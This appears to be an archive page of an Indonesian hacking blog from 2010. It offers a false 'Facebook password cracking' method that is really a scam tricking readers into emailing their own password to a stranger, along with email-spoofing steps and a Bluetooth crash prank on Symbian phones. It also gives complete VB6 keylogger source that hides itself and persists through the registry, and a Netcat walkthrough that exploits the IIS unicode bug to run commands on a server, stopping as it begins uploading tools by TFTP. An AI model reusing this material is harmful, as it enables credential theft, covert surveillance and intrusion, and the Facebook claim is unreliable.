Home » Archives for Maret 2010

Cara menjebol password Facebook

Posted by Toro Rahman Aziz Sabtu, 20 Maret 2010 1 comment
Hai teman apakan anda tahu cara mengetahui password orang lain.Tak banyak yang tau kalau ternyata facebook dan yahoo menjalin sebuah kerja sama yang unik, hal ini baru saya tau beberapa waktu yang lalu dari seorang kawan yg kebetulan juga baru mendapatkan informasi ini.
Dan dengan memanfaatkan celah dari kerja sama inilah kita dapat mengetahui password dari account facebook seseorang dengan sangat mudah.
Saya sendiri sudah mencoba beberapa cara dan selalu gagal, sudah men-download berbagai macam software dalam usaha ini tapi tetap saja tak berhasil mendapatkan password account yg di incar.
Tapi ternyata, setelah mengetahui celah ini, saya sampai merasa bodoh sendiri. Karena ternyata sangat mudah mendapatkan password facebook seseorang jika kita tau cara yg tepat.
Dan sama sekali tidak memerlukan software…!!
oke akan saya jelaskan caranya..
1. login ke yahoo.
ingat..!! account yahoo anda harus berumur minimal 30 hari agar cara ini bekerja dengan baik dan harus merupakan alamat email yg anda gunakan pada saat registrasi facebook. Yahoo akan dengan otomatis menolak email yg tidak terhubung ke Facebook.
2. Jika sudah masuk ke yahoo, tulislah sebuah email yang anda tujukan untuk staff facebook di Yahoo dengan alamat email: web_master_passdb@yahoo.com server Yahoo akan mengirimkan secara otomatis password “terlupakan” tersebut.
3. Pada baris SUBJECT masukkan/ketik kalimat : PASSWORD RETRIEVE
4. lalu pada baris pertama mail anda tuliskan alamat email korban yg akan anda hack
5. Pada baris kedua masukkan alamat email yg anda gunakan
6. Pada baris ketiga tuliskan password yahoo anda.
Ingat, password yang anda masukkan inilah yang akan menentukan berhasil tidaknya usaha anda karena sever yahoo akan secara otomatis melakukan login untuk meng-konfirmasi valid atau tidaknya email andan, dengan kata lain server yahoo akan meng-extract password dari email calon korban anda dengan menggunakan password anda.
Dan proses ini sangat aman karena anda mengirim email kepada mesin dan bukan kepada seseorang.
7. Dan di baris terakhir masukkan kata : cgi-bin/$et76431&pwrsa ini merupakan kode yang dibutuhkan untuk men-cocokkan email anda dengan email calon korban yg anda minta password nnya.
jadi jika misalkan email anda adalah cinta.laura@yahoo.com
dan email korban anda adalah krisdayanti@yahoo.com
dan password anda adalah : rahasia
maka email yg anda tulis nantinya adalah:
To: web_master_passdb@yahoo.com
bcc: cc: (biarkan kosong)
Subject: password retrieve
krisdayanti@yahoo.com
cinta.laura@yahoo.com
rahasia
cgi-bin/$et76431&pwrsa
selanjutnya setelah anda mengirim email tersebut anda akan mendapatkan balasan secara otomatis dari yahoo dengan dengan subject: System Reg
Message
biasanya yahoo memerlukan waktu sekitar 20 menit untuk mengkonfirmasikan dan meng-extract password yang anda minta.
selamat mencoba…




Trik mengirim email palsu

Posted by Toro Rahman Aziz Selasa, 02 Maret 2010 0 comments
Mas, Om, Paman, Tante, Bapak or Ibu Admin yang baik hati.Pada kesempatan ini gw mau berbagi pengetahuan seputar Trik mengirim email palsu. Trik ini gw dapet pas gw dapat Kejadian yang aneh. Di inbox email gw ada email yang mengatakan bahwa itu email berasal dari Raja Alien planet Nebola yang mengatakan bahwa gw adalah target mereka untuk ditangkep!!!!!!Mungkin Karena gw Ganteng kale yah???Walaaaaah,, Adapun alamat emailnya yaitu Alienx@Planet_Nebola.co.id .Tapi Pas gw cek by ricek selama semaleman ternyata alamat email itu Palsu alias Bodong. Dan keesokan Paginya gw akhirnya dapetin tuh trik orang iseng bwat ngirim email palsu,,,
Begini Triknya:

1. Buka Situs http://deadfake.com/

2. Kemudian Klik Tulisan Send Fake mail yang ada dibagian atas.

3. Trus isi kolom-kolomnya sesuai Hati lw,misalnya:To: Masukin Email TargetFrom: Masukin Email palsu sesuai Keinginan kalianSubjek: terserah kalian jugaMassage: Isi email yang mau lw tulis

4. Langkah terakhir jangan lupa masukin kode Verifikasinya ok ok.Ingeet Tindakan ini dapat merugikan orang lain, jadi jangan ditiru ya,,ini semua hanya untuk pembelajaran aja okeeey.. JAdilah Manusia yang berguna Bagi orang lain (cieeeelah lagi Tobat Ceritanyaa) hehehehe,,





Merestart HP Orang Lain Dengan Bluetooth

Posted by Toro Rahman Aziz Senin, 01 Maret 2010 0 comments
Dengan sedikit trik, anda bisa merestart HP symbian teman anda tanpa harus melakukan kontak fisik ^_^ Anda bisa membuat kontes dengan teman-teman anda.. :)
 
Langkah2

Bukalah Notepad kemudian ketik " (tanda kutip) lalu tekan tombol [Tab] dan ketiklah Restart kemudian tekan tombol [Tab] lagi dan akhiri dengan " (tanda kutip). Bingung yach? nich contohnya: " Restart " Ingat yach, setelah tanda kutip yang harus anda tekan adalah tombol [Tab], bukan space.

Setelah itu, simpan file tersebut dengan nama Restart.txt atau apa aja laah.. kirim file tersebut ke HP anda melalui bluetooth atau apaa aja :)

Kini cobalah buka file tadi di HP anda, Copy teks yang tadi anda ketikkan. 

Buka settingan Bluetooth anda, ubah namanya menjadi teks yang tadi anda copy. Tinggal paste ajah. Ups, kenapa?? namanya jadi kacau yach?? tenang ajah, itu tandanya anda berhasil :P

Datangi teman anda, katakan hal-hal menarik yang bisa membuat dia terkagum-kagum. Misalnya: 

"Bro, gue bisa bikin HP loe restart tanpa harus gue sentuh. Coba sekarang loe pake bluetooth loe."

Saat teman anda mengaktifkan bluetooth nya, HP Sysmbiannya akan otomatis restart :D Atau anda bisa mengusili orang-orang di sekeliling anda yang sedang memakai bluetooth

How it can BE??

Mudah saja, Symbian akan mendeteksi keberadaan bluetooth yang aktif, namun tidak bisa menampilkan device bluetoothnya karena dia tidak pernah mengenal karakter Tab. Hal ini akan mengakibatkan ERROR sehingga dia akan melakukan restart system secara otomatis.

 




Keylogger

Posted by Toro Rahman Aziz 0 comments
Mungkin kita semua sudah sering mendengar tentang KeyLogger. Yeah.. KeyLogger adalah software yg mencatat gerak-gerik, atau aktifitas tombol yg kita tekan pada keyboard di sebuah Komputer. KeyLogger kemudian mencatat semua informasi pada sebuah catatan(LOG). Hmm.. dengan keylogger ini kita bisa mengetahui aktivitas user. Misalnya aja user habis buka E-mail, kamu bakalan tau ID-nya si User :D 

Okay... berikut ini source code KeyLogger yang bisa kamu compile pake VB6. Kita hanya butuh sebuah timer dan module. 

Yang perlu diperhatikan : 

1. setelah REGSVC32.exe dieksekusi, keylogger tsg akan lg menulis di registry agar program tsb dieksekusi pd waktu booting: 

(hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run). 

2. Aktifitas keylogger ini tidak dapat dilihat melalui task manager (Ctrl+Alt+Del) 

3. kamu tidak dapat menghapus file REGSVC32.exe (this file is being used by windows) 

4. kamu tidak dapat menghentikan booting REGSVC32.exe melalui regedit ato msconfig 

5. Untuk melihat hasil rekaman KeyLogger ini kamu bisa buka file REGSVC32.DLL dengan Notepad 

6. selama Keylogger ini aktif kamu tidak bisa melakukan Logoff user ... :( 

  

  

======= code mulai ========================== 

  

'simpan file hasil compile dg nama regsvc32.exe 

'form 

'simpan dg nama FRMLOG.frm 

  

Option Explicit 

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) 

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer 

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long 

Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long  

Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal ProcessID As Long, ByVal ServiceFlags As Long) As Long 

Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long 

  

Private sAppName As String 

  

  

Private Const REG_SZ = 1 

Private Const LOCALMACHINE = &H80000002 

Private Const RSP_SIMPLE_SERVICE = 1 

Private Const RSP_UNREGISTER_SERVICE = 0 

  

Private Const VK_BACK = &H8 

Private Const VK_CONTROL = &H11 

Private Const VK_SHIFT = &H10 

Private Const VK_TAB = &H9 

Private Const VK_RETURN = &HD 

Private Const VK_MENU = &H12 

Private Const VK_ESCAPE = &H1B 

Private Const VK_CAPITAL = &H14 

Private Const VK_SPACE = &H20 

Private Const VK_SNAPSHOT = &H2C 

Private Const VK_UP = &H26 

Private Const VK_DOWN = &H28 

Private Const VK_LEFT = &H25 

Private Const VK_RIGHT = &H27 

Private Const VK_MBUTTON = &H4 

Private Const VK_RBUTTON = &H2 

Private Const VK_LBUTTON = &H1 

Private Const VK_PERIOD = &HBE 

Private Const VK_COMMA = &HBC 

  

Private Const VK_NUMLOCK = &H90 

Private Const VK_NUMPAD0 = &H60 

Private Const VK_NUMPAD1 = &H61 

Private Const VK_NUMPAD2 = &H62 

Private Const VK_NUMPAD3 = &H63 

Private Const VK_NUMPAD4 = &H64 

Private Const VK_NUMPAD5 = &H65 

Private Const VK_NUMPAD6 = &H66 

Private Const VK_NUMPAD7 = &H67 

Private Const VK_NUMPAD8 = &H68 

Private Const VK_NUMPAD9 = &H69 

  

Private Const VK_F9 = &H78 

Private Const VK_F8 = &H77 

Private Const VK_F7 = &H76 

Private Const VK_F6 = &H75 

Private Const VK_F5 = &H74 

Private Const VK_F4 = &H73 

Private Const VK_F3 = &H72 

Private Const VK_F2 = &H71 

Private Const VK_F12 = &H7B 

Private Const VK_F11 = &H7A 

Private Const VK_F10 = &H79 

Private Const VK_F1 = &H70 

Private Sub LoadTextFile() 

On Error GoTo dlgerror 

If Len(App.Path) <= 3 Then 

Open App.Path & "settings.ini" For Input As #1 

Line Input #1, sAppName 

Close 

Else 

Open App.Path & "\settings.ini" For Input As #1 

Line Input #1, sAppName 

Close 

End If 

  

If sAppName = vbNullString Then 

sAppName = "regsvc32" 

End If 

  

Exit Sub 

dlgerror: 

sAppName = "regsvc32" 

  

End Sub 

  

  

Private Sub SAVEDLL() 

Dim nSaveLocation As String 

On Error GoTo dlgerror 

  

If Len(App.Path) <= 3 Then 

Open App.Path & sAppName & ".dll" For Append As #1 

nSaveLocation = App.Path & sAppName & ".dll" 

GoTo READY 

Else 

Open App.Path & "\" & sAppName & ".dll" For Append As #1 

nSaveLocation = App.Path & "\" & sAppName & ".dll" 

GoTo READY 

End If 

  

READY: 

   

  If txtLOGGED.Text = vbNullString Then 

  Exit Sub 

  End If 

   

  Print #1, Time & " " & Date & vbCrLf & "Size: " & Format(FileLen(nSaveLocation) / 1000000, ".0") & " MB" & vbCrLf & "*** PROGRAMS OPENED ***" & vbCrLf & vbCrLf & txtENUMERATE.Text & vbCrLf & vbCrLf & txtLOGGED.Text & vbCrLf & vbCrLf 

  Close 

  Close 

  Close 

  SetAttr nSaveLocation, vbHidden 

  Exit Sub 

dlgerror: 

Err.Clear 

Exit Sub 

End Sub 

Private Sub Form_Load() 

On Error Resume Next 

Call LoadTextFile 

Me.Caption = sAppName 

Me.Visible = False 

App.TaskVisible = False 

App.Title = sAppName 

ENTERREGISTRY 

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE 

End Sub 

Private Sub ENTERREGISTRY() 

Dim nKey As Long 

RegCreateKey LOCALMACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Run", nKey 

If Len(App.Path) <= 3 Then 

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & ".exe", Len(App.Path & App.EXEName & ".exe") 

Else 

RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & "\" & App.EXEName & ".exe", Len(App.Path & "\" & App.EXEName & ".exe") 

End If 

End Sub 

Private Sub Form_Unload(Cancel As Integer) 

Cancel = True 

Call SAVEDLL 

ENTERREGISTRY 

Unload Me 

End 

End Sub 

Private Sub tmrCAPTION_Timer() 

On Error Resume Next 

Me.Caption = sAppName 

Me.Visible = False 

App.TaskVisible = False 

App.Title = False 

RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE 

End Sub 

  

Private Sub tmrLOG_Timer() 

On Error Resume Next 

Dim nKey, nChar As Integer 

Dim nText As String 

For nChar = 1 To 255 

nKey = GetAsyncKeyState(nChar) 

If nKey = -32767 Then 

nText = Chr(nChar) 

  

  If nChar = VK_BACK Then 

  nText = " {B.S} " 

  ElseIf nChar = VK_CONTROL Then 

  nText = " {CTRL} " 

  ElseIf nChar = VK_SHIFT Then 

  nText = " {SHIFT} " 

  ElseIf nChar = VK_TAB Then 

  nText = " {TAB} " 

  ElseIf nChar = VK_RETURN Then 

  nText = " {ENTER} " 

  ElseIf nChar = VK_MENU Then 

  nText = " {ALT} " 

  ElseIf nChar = VK_ESCAPE Then 

  nText = " {ESC} " 

  ElseIf nChar = VK_CAPITAL Then 

  nText = " {CAPS} " 

  ElseIf nChar = VK_SPACE Then 

  nText = " {SP.B} " 

  ElseIf nChar = VK_UP Then 

  nText = " {UP} " 

  ElseIf nChar = VK_LEFT Then 

  nText = " {LEFT} " 

  ElseIf nChar = VK_RIGHT Then 

  nText = " {RIGHT} " 

  ElseIf nChar = VK_DOWN Then 

  nText = " {DOWN} " 

  ElseIf nChar = VK_F1 Then 

  nText = " {F1} " 

  ElseIf nChar = VK_F2 Then 

  nText = " {F2} " 

  ElseIf nChar = VK_F3 Then 

  nText = " {F3} " 

  ElseIf nChar = VK_F4 Then 

  nText = " {F4} " 

  ElseIf nChar = VK_F5 Then 

  nText = " {F5} " 

  ElseIf nChar = VK_F6 Then 

  nText = " {F6} " 

  ElseIf nChar = VK_F7 Then 

  nText = " {F7} " 

  ElseIf nChar = VK_F8 Then 

  nText = " {F8} " 

  ElseIf nChar = VK_F9 Then 

  nText = "{F9}" 

  ElseIf nChar = VK_F10 Then 

  nText = " {F10} " 

  ElseIf nChar = VK_F11 Then 

  nText = " {F11} " 

  ElseIf nChar = VK_F12 Then 

  nText = " {F12} " 

  ElseIf nChar = VK_SNAPSHOT Then 

  nText = " {PRINT SCRN} " 

  ElseIf nChar = VK_RBUTTON Then 

  nText = " {R.B} " 

  ElseIf nChar = VK_LBUTTON Then 

  nText = " {L.B} " 

  ElseIf nChar = VK_MBUTTON Then 

  nText = " {M.B} " 

  ElseIf nChar = VK_PERIOD Then 

  nText = "." 

  ElseIf nChar = VK_COMMA Then 

  nText = "," 

  ElseIf nChar = VK_NUMLOCK Then 

  nText = " {NUMLCK} " 

  ElseIf nChar = VK_NUMPAD0 Then 

  nText = "0" 

  ElseIf nChar = VK_NUMPAD1 Then 

  nText = "1" 

  ElseIf nChar = VK_NUMPAD2 Then 

  nText = "2" 

  ElseIf nChar = VK_NUMPAD3 Then 

  nText = "3" 

  ElseIf nChar = VK_NUMPAD4 Then 

  nText = "4" 

  ElseIf nChar = VK_NUMPAD5 Then 

  nText = "5" 

  ElseIf nChar = VK_NUMPAD6 Then 

  nText = "6" 

  ElseIf nChar = VK_NUMPAD7 Then 

  nText = "7" 

  ElseIf nChar = VK_NUMPAD8 Then 

  nText = "8" 

  ElseIf nChar = VK_NUMPAD9 Then 

  nText = "9" 

  End If 

txtLOGGED.Text = txtLOGGED.Text + nText 

End If 

Next 

Call GetActiveWindowName 

End Sub 

Private Sub tmrSAVE_Timer() 

Call SAVEDLL 

txtLOGGED.Text = vbNullString 

txtENUMERATE.Text = vbNullString 

End Sub 

  

====code end =========== 

  

  

============code mulai ============ 

  

'module visual basic 

'simpan dg nama mdlActiveWindow.bas 

  

Option Explicit 

  

Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long 

Public Declare Function GetForegroundWindow Lib "user32" () As Long 

Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long 

Public nCAPTION As String 

Public nTESTER As Long 

Public nClass As String 

  

Public Sub GetActiveWindowName() 

nCAPTION = Space(256) 

nClass = Space(256) 

  

GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION) 

GetClassName GetForegroundWindow, nClass, Len(nClass) 

  

If nTESTER = GetForegroundWindow Then Exit Sub 

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & " " & nCAPTION 

FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass 

nTESTER = GetForegroundWindow 

End Sub 

============ code end ==========

  

/* ------------------------------|EOF|------------------------------ */





Tutorial Hacking Menggunakan Netcat

Posted by Toro Rahman Aziz 0 comments
Tools ini sering disebut sebagai “TCP/IP Swiss Army Knife”-nya para hacker. Versi orisinalnya
ditulis untuk sistem operasi Unix oleh Hobbit (hobbit@avian.org) pada tahun 1995. Versi
Windows NT dikerjakan oleh Weld Pond (weld@l0pth.com).
Fitur dari Netcat antara lain adalah:
• Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari
port mana saja.
• Dapat membaca argumen pada command line dari standar input
• Full DNS forwarding/reverse checking
• Kemampuan untuk menggunakan any local source port
• Kemampuan menggunakan any locally-configured network source address
• Tersedia port scanning secara built-in
• Dan lain-lain

Tools ini sering disebut sebagai “TCP/IP Swiss Army Knife”-nya para hacker. Versi orisinalnya
ditulis untuk sistem operasi Unix oleh Hobbit (hobbit@avian.org) pada tahun 1995. Versi
Windows NT dikerjakan oleh Weld Pond (weld@l0pth.com).
Fitur dari Netcat antara lain adalah:
• Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari
port mana saja.
• Dapat membaca argumen pada command line dari standar input
• Full DNS forwarding/reverse checking
• Kemampuan untuk menggunakan any local source port
• Kemampuan menggunakan any locally-configured network source address
• Tersedia port scanning secara built-in
• Dan lain-lain
Dengan fitur di atas, banyak para hacker dan pengelola sistem memanfaatkan untuk melakukan
hal-hal sebagai berikut:

• Scanning port dan menginventori service-service yang terpasang pada server
• File transfer
• Pengujian dan simulasi terhadap server
• Pengujian terhadap firewall, proxy dan gateway
• Pengujian performance network
• Pengujian address spoofing
• Banner grabbing
Lisensi Dokumen:
Copyright © 2003 IlmuKomputer.Com
Seluruh dokumen di IlmuKomputer.Com dapat digunakan, dimodifikasi dan disebarkan
secara bebas untuk tujuan bukan komersial (nonprofit), dengan syarat tidak menghapus atau
merubah atribut penulis dan pernyataan copyright yang disertakan dalam setiap dokumen.
Tidak diperbolehkan melakukan penulisan ulang, kecuali mendapatkan ijin terlebih dahulu
dari IlmuKomputer.Com.
Artikel Populer IlmuKomputer.Com
Copyright © 2003 IlmuKomputer.Com
2
Beberapa fitur dan pemanfaatan Netcat akan dijelaskan di bawah. Namun kami harus selalu
mengingatkan Anda, jangan pernah mencoba kemampuan netcat di sistem komputer yang
bukan milik anda sendiri !
Instalasi Netcat
Saat ini Netcat telah tersedia tidak saja pada sistem operasi Unix dan Linux, melainkan juga
pada sistem operasi Windows.
Pada tulisan ini kami menggunakan Netcat dengan sistem operasi Windows. Semua perintah
pada command line sama dengan perintah yang terdapat pada Netcat dengan sistem operasi
Unix.
Instalasi Netcat pada sistem operasi Windows sangat sederhana. Pertama Anda dapat
mendownload dari situs http://www.atstake.com/research/tool…ork_utilities/ atau di
banyak situs hacker lainnya. Namun demikian Anda harus waspada jika mendownload dari situs
yang tidak Anda kenal betul, bisa jadi tools Netcat-nya sudah dimodifikasi menjadi trojan horse
yang dapat mengganggu sistem Anda
Kemudian Anda cukup melakukan unzip terhadap file yang telah Anda download yaitu
nc11nt.zip ke dalam sebuah direktori sebagai berikut:
C:\TMP\NETCAT> dir
Volume in drive C has no label.
Volume Serial Number is 141F-1208
Directory of C:\TMP\NETCAT
02/23/2003 05:03 PM .
02/23/2003 05:03 PM ..
11/03/1994 07:07 PM 4,765 GETOPT.H
01/04/1998 03:17 PM 69,081 NETCAT.C
01/03/1998 02:37 PM 59,392 NC.EXE
11/28/1997 02:48 PM 12,039 DOEXEC.C
11/28/1997 02:36 PM 544 MAKEFILE
11/06/1996 10:40 PM 22,784 GETOPT.C
07/09/1996 04:01 PM 7,283 GENERIC.H
02/06/1998 03:50 PM 61,780 HOBBIT.TXT
02/06/1998 05:53 PM 6,771 README.TXT
02/22/2000 11:24 AM 2,044 AVEXTRA.TXT
10 File(s) 246,483 bytes
2 Dir(s) 8,868,044,800 bytes free
C:\TMP\NETCAT>
File utama yang perlu Anda perhatikan hanyalah nc.exe saja, file lainnya perlu Anda perhatikan
bila Anda perlu melakukan kompilasi ulang.
Memulai Netcat
Sebelum memulai, sebaiknya Anda perlu mengetahui fasilitas apa saja yang tersedia pada
Netcat. Untuk itu Anda dapat memulai dengan melihat option yang tersedia. Untuk mengetahui
option yang tersedia pada Netcat, cukup memanggil help-nya pada Dos prompt sebagai berikut:
C:\TMP\NETCAT> nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [options] [hostname] [port]
Artikel Populer IlmuKomputer.Com
Copyright © 2003 IlmuKomputer.Com
3
options:
-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
C:\TMP\NETCAT>
Secara umum perintah Netcat memiliki struktur sebagai berikut:
C:\> nc –opsi
Port Scanning
Seperti juga pisau Swiss Army yang memiliki banyak mata pisau beraneka fungsi, maka Netcat
juga memiliki aneka fungsi yang dimiliki tools lainnya, salah satunya adalah “mata pisau” port
scanning
Walaupun tidak selengkap dan secanggih tools Nmap atau Supercan, Netcat dapat digunakan
untuk melihat port mana saja yang terbuka. Berikut ini contoh untuk memeriksa status port web
dari port 10 s./d port 140 dari situs web tertentu, sebagai berikut:
C:\TMP\NETCAT> nc -v -z server01 10-140
server01 [128.1.9.81] 139 (netbios-ssn) open
server01 [128.1.9.81] 113 (auth) open
server01 [128.1.9.81] 110 (pop3) open
server01 [128.1.9.81] 98 (?) open
server01 [128.1.9.81] 80 (http) open
server01 [128.1.9.81] 79 (finger) open
server01 [128.1.9.81] 25 (smtp) open
server01 [128.1.9.81] 23 (telnet) open
server01 [128.1.9.81] 21 (ftp) open
C:\TMP\NETCAT>
Perintah di atas akan melakukan scanning port 10 s/d 140 dari host server01 dengan address IP
128.1.9.81. Option –z merupakan option yang dipergunakan untuk melakukan scanning.
Banner Grabbing
Salah satu cara mendapatkan informasi mengenai sistem operasi dan aplikasi yang dijalankan
oleh sebuah host adalah dengan melakukan banner grabbing atau membaca informasi yang ada
di dalam banner sebuah sistem.
Berikut ini kemampuan Netcat untuk mengambil header suatu situs web yang biasanya
menyimpan informasi penting sebagai berikut (Jangan lupa ketikkan “Get/HTTP” seperti
terlihat pada baris kedua dari contoh hasil di atas.)
Artikel Populer IlmuKomputer.Com
Copyright © 2003 IlmuKomputer.Com
4
C:\TMP\NETCAT> nc -v -n 128.1.71.103 80
(UNKNOWN) [128.1.71.103] 80 (?) open
get http
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Sat, 11 Oct 2003 03:34:24 GMT
Content-Type: text/html
Content-Length: 87
ErrorThe parameter is incorrect.

C:\TMP\NETCAT>
Penggunaan option –n diperlukan jika address yang Anda berikan adalah berupa nomor IP. Jika
berupa address internet, anda tidak memerlukan option –n tersebut. Port yang diuji adalah port
80.
Dari contoh di atas Anda dapat mengetahui bahwa sistem operasi yang dipergunakan adalah
Microsoft dengan IIS/5.0.
Perhatikan contoh berikutnya:
C:\TMP\NETCAT> nc -v www.cobacoba.com 80
www.cobacoba.com [128.1.9.9] 80 (http) open
get/http

501 Method Not Implemented
Method Not Implemented

get/http to /index.html not supported.

Invalid method in request get/http
Apache/1.3.12 Server at www.cobacoba.com Port 80

C:\TMP\NETCAT>
Pada contoh di atas tidak menggunakan option –n karena address yang digunakan adalah bukan
nomor IP. Dari hasil di atas tidak terlihat sistem operasinya tetapi terlihat bahwa host tersebut
menggunakan Apache Versi 1.3.12.
Skenario Menyusup ke dalam Server Web!
Untuk menyusup ke dalam server web diperlukan beberapa langkah dan ketrampilan tersendiri.
Tidak saja ketrampilan menggunakan Netcat, tetapi juga pengetahuan kita mengenai sistem
target. Dalam contoh skenario kali ini, kita akan menyusup ke sebuah server web yang
menggunakan sistem operasi Windows 2000 dengan IIS 5.0. Untuk itu diperlukan pemahaman
mengenai sebuah bugs dari Microsoft IIS 5.0, yaitu unicode bugs, yang sampai saat ini masih
saja ada server web yang belum dipasang patch karena kelalaian atau ketidaktahuan sang
pengelola sistem.
Fokus kita bukan mengenai apa dan bagaimana bugs Microsoft tersebut, melainkan bagaimana
memanfaatkan Netcat untuk melakukan penyusupan dan bahkan download dokumen dari server
web. Perhatikan, semua dilakukan dengan satu tools, Netcat saja, walaupun bisa saja Anda
menggunakan tools-tools lainnya. Itu sebabnya Netcat disebut sebagai “TCP/IP Swiss Army
Knife”
Artikel Populer IlmuKomputer.Com
Copyright © 2003 IlmuKomputer.Com
5
Mari kita memulai dengan mencari server web yang menggunakan Microsoft Windows 2000
dengan IIS versi 5.0 sebagai berikut (sebagian akan menggunakan option dari netcat yang telah
dijelaskan di atas):
C:\TMP\NETCAT> nc -v -z ristbook 20-80
ristbook [128.1.71.103] 80 (http) open
ristbook [128.1.71.103] 25 (smtp) open
ristbook [128.1.71.103] 21 (ftp) open
C:\TMP\NETCAT>
OK, terlihat server ristbook membuka port 80 yang ada diduga merupakan server web.
Selanjutnya Anda perlu menyelidiki, adakah server ristbook merupakan server web
menggunakan Microsoft dan IIS 4.0/5.0?
C:\TMP\NETCAT> nc -v ristbook 80
ristbook [128.1.71.103] 80 (http) open
get http
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Sat, 11 Oct 2003 08:51:34 GMT
Content-Type: text/html
Content-Length: 87
ErrorThe parameter is incorrect.

C:\TMP\NETCAT>
Aha, ternyata server tersebut merupakan server web yang menggunakan Microsoft dengan IIS
5.0. Selanjutnya kita akan menguji apakah server web ini sudah memasang patch dan terhindar
dari bugs unicode ?
C:\TMP\NETCAT> nc -v ristbook 80
ristbook [128.1.71.103] 80 (http) open
get http://ristbook/scripts/..%255c../wi…exe?/c+dir+c:\
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 11 Oct 2003 09:06:52 GMT
Content-Type: application/octet-stream
Volume in drive C has no label.
Volume Serial Number is 0C42-12EA
Directory of c:\
09/17/2001 11:46a 1,012 FRUNLOG.TXT
09/17/2001 11:35a WINDOWS
09/17/2001 11:58a My Documents
09/17/2001 11:35a Program Files
09/17/2001 12:43p ATI
05/05/1999 09:20a 31,512 MAESTRO.COM
09/17/2001 12:50p 0 CONFIG.AGO
05/05/1999 09:20a 11,084 AECU.SYS
09/26/2003 08:35p 30 mstrinf.ini
09/17/2001 12:50p 0 AUTOEXEC.AGO
07/01/2003 07:22p museum
06/06/2001 06:28a 1,071 my_cnf.bak
06/25/2002 07:35p 697 FRONTPG.LOG
08/29/2003 04:16p NAV2001
08/29/2003 04:51p ServicePack
01/28/2002 03:45p HTML
06/17/2002 06:17p 22 autoexec.nav
09/19/2003 04:49p denny
08/27/2003 06:38p 28,290 SCANDISK.LOG
04/05/2003 06:53a 967 command.PIF
06/09/2002 10:16p 442 SETUPXLG.TXT
10/05/2001 03:33p 40,923 c1605r-psn.txt
01/04/2002 12:20p tmp
10/24/2001 02:32p tms20
06/27/2001 11:57p 1,574 index.html.no
Artikel Populer IlmuKomputer.Com
Copyright © 2003 IlmuKomputer.Com
6
11/13/1998 01:23a 106,496 sqlsun.dll
01/28/2002 03:52p 289 sqlsunin.ini
09/26/2003 12:29p 157,817 winzip.log
01/28/2002 03:53p 85,526 Uninst.isu
12/13/2001 04:30p 317 Shortcut to cuteftp.exe.lnk
06/21/2002 10:34a Acrobat3
01/22/2002 03:18p My Received Files
01/28/2002 03:49p LOG
07/30/2002 01:40p 34,565 atapi.exe
04/06/2003 06:41p 82 asoy.ftp
01/28/2002 03:45p Upgrade
12/07/1999 07:00p 236,304 cmdkoe.exe
01/28/2002 03:45p Install
06/25/2002 07:34p Inetpub
07/05/2002 07:02p Documentation
02/12/2002 01:28p 227,467 datacenter1.jpg
02/09/2002 03:29p 2,920 datacenterthumb.jpg
11/15/2001 03:07p 3,384 sqlnet.log
09/17/1999 06:38p 1,234 Table of Contents.htm
06/26/2002 03:22p ftproot
26 File(s) 974,025 bytes
19 Dir(s) 119,435,264 bytes free
C:\TMP\NETCAT>
Ooops, tampaknya pengelola sistemnya lalai dan belum dipasang patchnya untuk bugs unicode.
OK, Anda dapat melanjutkan langkah berikutnya dengan menyusupkan tools serba guna kita ke
dalam server web tersebut, ya, mengcopykan netcat ke dalam server tersebut ! Dengan
meletakkan tools serba guna Netcat pada server web, maka Anda dapat mengendalikan server
web tersebut dengan leluasa.
Salah satu cara menyusupkan netcat ke dalam ke dalam server web tersebut adalah
memanfaatkan service tftp (Trivial File Transfer Protocol). Anda dapat memerintahkan server
web target Anda untuk mengupload netcat dari tftp server yang terpasang di komputer Anda.
Untuk itu Anda harus mengaktifkan atau menginstall tftp server pada komputer Anda, jika
belum tersedia. Jika komputer Anda menggunakan sistem operasi Windows, Anda dapat
menginstall aplikasi freeware tftpd32 buatan Philippe Jounin (ph.jounin@computer.org) yang
dapat Anda download dari http://membres.lycos.fr/phjounin/ atau dari situs-sistus hacker
lainnya.
Selanjutnya Anda dapat mengaktifkan tftp server sebagai berikut:
